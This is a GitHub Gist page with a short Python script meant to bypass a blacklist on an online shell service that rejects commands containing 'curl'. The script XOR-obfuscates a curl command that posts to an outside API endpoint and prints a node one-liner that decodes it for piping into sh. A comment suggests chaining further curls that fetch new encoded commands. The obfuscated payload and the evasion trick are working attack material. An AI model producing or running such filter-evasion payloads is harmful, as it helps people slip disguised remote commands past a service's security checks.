Created
August 19, 2018 20:35
-
-
Save berdario/6161a1f9e4bc4d246bcd97379f9f48ab to your computer and use it in GitHub Desktop.
http://www.lambdashell.com/ uses `command.includes('curl')` to blacklist curl, such a check can be bypassed by piping the output of this script into sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from random import choices, seed | |
| from sys import argv | |
| payload = b'''curl -v -X POST -H 'Content-Type: application/json' -d '{command: "echo \\"place here another CURL to a server that will return a newly encoded cmd to tie the knot\\""}' https://yypnj3yzaa.execute-api.us-west-1.amazonaws.com/dev''' | |
| seed(argv[1]) | |
| obfuscation_key = choices(range(256), k=len(payload)) | |
| obfuscated_payload = [x ^ y for x, y in zip(payload, obfuscation_key)] | |
| print(f"node -e 'console.log(String.fromCharCode(...{obfuscated_payload}.map((x,i)=>x^{obfuscation_key}[i])))'") # Could be obfuscated further by adding random spacing, using with something like http://www.jsfuck.com/ etc. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment